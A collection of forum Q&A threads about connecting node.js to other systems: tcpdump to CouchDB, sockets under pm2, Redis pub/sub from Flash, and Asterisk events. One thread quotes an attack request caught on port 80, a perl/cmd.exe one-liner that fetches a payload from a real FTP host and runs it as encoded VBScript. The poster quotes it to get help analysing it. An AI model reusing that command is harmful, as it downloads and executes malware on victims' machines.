I have an access point running openWRT v12.09 with tcpdump installed. On a server I have node.js running with couchdb. I would like the output of tcpdump to be written to couchdb. This is where I'm a bit in the dark. I can't figure out how to make the connection between openWRT/tcpdump to node.js/couchdb.
I read a pipe is way to have one side reading data and the other side storing the data. That would be the goal since the storage capacity of the access point is limited. I would like the output of tcpdump to be converted in to JSON, is that possible? So it's easy to read and store in the database.
I read about, openVPN, pipe, nodecat and tried a bunch of things but I need some assistance please, thank you.
Why won't you use simple HTTP protocol? That's exactly the case for which it was invented - moving resources accross the Web.
Install lightweight HTTP server on the access point, if you don't have one there already. For example, boa is very lightweight, single-tasking HTTP server, which could be more than enough for this purpose.
Then, just:
let the tcpdump store the file in the server directory tree at the access point
on the server, use HTTP module of node.js to download the file
store it in the database.
That's it. There's no need nor is it a good idea to convert your binary data into JSON!
Related
My application is using Net API (https://nodejs.org/api/net.html) sockets and accept connections from clients that cannot use any other way to communicate than raw TCP sockets.
I'm trying to use pm2 with my app and clusterize it on all my cpus. Unfortunately this does not work since one process cannot use the in-memory stored sockets from any of the other processes.
I'm looking for a way to save each connections to a database, even an in-memory store would fit my needs for as long as i can call it and use it again from any other process.
Somebody else asked pretty much the same question here he was told that he should just use Redis to store the sockets. But the guy who answered apparently had no idea how to do that.
Question was asked here: Will PM2 work with Node.js net API?
My question is how could i do that ?
Actually i think this is just impossible. What i really need is a way to "recreate" the socket object through it's file descriptor number that could be save as an integer in the database, but again, this is getting really tricky. I'm kind of stuck here. Documentation says nothing about it.
Maybe there's another way to keep my app stateless ?
Thanks a lot for reading, i'll be glad if someone can help.
There are no methods to save a special type that is a resource.
In the database you can save the way how to re-created it (re-opene).
But I think that in your situation, a better solution will be to add an extra layer that will provide communication with a descriptor and all elements of the cluster. In the option you have: exchange events between node process or WebSockets.
What you can do is sharing file descriptors by passing them between the server processes using a Unix domain socket. Have a look at the usocket package which implements passing file descriptors for Node.js.
Our company processes machine data. We get machine reports from a socket connection and write the data to mysql tables. Then, other scripts and threads written in python and ruby pull these records out and process the data, saving them back to the database and notify our clients on their machines health.
I want to convert these processes to node.js But, i have to do it kinda incrementally. Instead of doing so much writing back and forth to the database, I would like to hand the data off from our input process to a node server, that will process everything at once.
I suppose i can modify our input scripts to hand off the raw bytes we get from the machines or I could process them as JSON. I had thought about writing the new processes using a node http server, but that seems like some overhead. I have thought websockets may be a better solution, but I am looking for ideas.. thanks
Some time ago I made a small program like SETI#home to generate the levels of a game that I'm working at. The program has a server and a client. They communicate on a port X using a simple protocol, and they use port 80 when the client is behind a HTTP proxy.
Having port 80 open, I receive a lot of weird HTTP requests. But two days ago one caught my attention:
{a few unreadable bytes that I dont know what they are}28{another byte}\perl.exe -esystem('cmd.exe /c echo open 222.91.160.59>f&echo 111>>f&echo qwe>>f&echo bin>>f&echo get one.zip>>f&echo bye>>f&ftp -s:f&cscript.exe /b /e:VBScript.Encode one.zip&del /f/q f&exit')
It makes a login file, connects via ftp to 222.91.160.59, downloads one.zip, disconnects, encodes with VBScript.Encode and deletes the file, right?
The questions:
Any idea what those few bytes at the beginning are? I assume that the request is some kind of HTTP request since it was sent to port 80, but how would it work?. Unfortunately I couldn't recover those bytes because I've outputted them as a string, I didn't write them in a log... How is this weird request suposed to be executed in a HTTP server?
The attack was not successful. I tried that evening to connect to the server, but it was closed. Yesterday, I found the server online and downloaded the file (with anonymous). I want to analyze it. Does anyone know how to decode it? I've never used VBScript.Encode, but I think that Encode either encodes/decodes and runs somehow one.zip, or the file uses a vulnerability in Encode or cscript.exe. Can someone guide me to analyze the file? I tried to base64 encode/decode it and even parts of it, but the result is unreadable.
If you want to see the beginning of one.zip, here you have a PNG: Beginning of one.zip
I assume that the .zip extension doesn't mean it is compressed, the author just put a random extension, since it is inputted directly to VBScript:Encode.
Thank you!
I'm trying to create a Flash app with some real time functionality, and would like to use Redis' pubsub functionality which is a perfect fit for what I need.
I know that connecting to a data store directly from client is almost always bad. What are the security implications of this (since I'm not an expert on Redis), and are there ways to work around them? From what I read, there is a possible exploit of doing config sets and changing the rdb file location and be able to arbitrary overwrite files. Is there anything else? (If I don't use that particular redis instance for anything at all, i.e. no data being stored)
I understand the alternative is to write some custom socket server program and have it act as the mediating layer for connecting to redis and issuing commands -- that's the work I'd like to avoid having to write, if possible.
** Edit **
Just learned about the rename-command configuration to disable commands. If I disable every single command on the redis instance and leave only SUBSCRIBE and PUBLISH open, would this be good enough to run on production?
I think it would be a bad idea to connect directly your client to Redis. Redis offers an authentication system for a unique user only. It expects this user to be your server app.
From my point of view, directly exposing Redis is always a bad idea. It would allow anybody to access all of your data. This is confirmed by the Redis doc.
So you won't avoid adding or developing the server side of your app.
I'm developing a sort of Flash Operator Pannel for Asterisk but, with Node.js and Socket.io instead of depending of Flash.
I've polished the node server and the front end BUT I don't know how could I send events from Asterisk to node server and do things that will be sended over the socket.
Given the fact that we have a heavily tuned Asterisk to suit our company needs, connecting to the AMI nor the Asterisk socket will solve my problem because we aren't working with real extensions.
So, despite the Asterisk part, I want to know how could I send info to node through bash or curls or whatever
I thought about using curls to the server but this could cause that someone who knows the commands (pretty unlikely) could alter the application flow with unreal data.
EDIT: Rethinking about it, I would just want to be able to receive requests through the socket/server ??? and then be able to perform actions that will be emited through socket.io.
Is that even possible?
The answer really depends upon what specific data you are trying to get from Asterisk to Node. You're trying to replace the Flash Operator Panel, yet you don't have real extensions. I'm guessing that you are using Asterisk as an SBC/proxy of sorts.
If you truly want an event-driven approach, I suggest modifying your dialplan to reach out to Node whenever needed, with whatever data you want. This would most easily be achieved by calling an AGI script with some number of arguments (written in whatever language) that then connects to Node via an HTTP POST, socket, or other.
If you want a more passive approach, you could have Node stream-read the asterisk log files for data, or, as already suggested, connect to the Asterisk Manager Interface (AMI) and stream from there. Contrary to what has been stated previously, I don't consider this to be a very daunting task.
You want to open a socket from Node to Asterisk's AMI (asterisk manager interface). I never used Node, but I would imagine the code would look roughly like this:
var astman = new net.socket().connect(5038);//connect to port 5039 on localhost
astman.on('data', function(data) {
//do something with received data
});
One of the most well maintained ami libraries are FreePBX's php-astmanager. While it's written in php, it should give you a pretty good idea of what your need to do.
You could certainly set up your node.js program to listen on a socket for messages from Asterisk. But you'd have to roll your own connection management scheme, authentication scheme, message durability (possibly), etc.
Alternatively -- and especially if there is the node server and asterisk server are not on the same machine -- you could use a message queue program like RabbitMQ. That takes care of a lot of the important details involved in interprocess communications. It's pretty easy, too. On the node side, check out https://github.com/postwait/node-amqp
I've never used Asterisk but running command line programs can be done with the child_process module.
http://nodejs.org/docs/latest/api/child_processes.html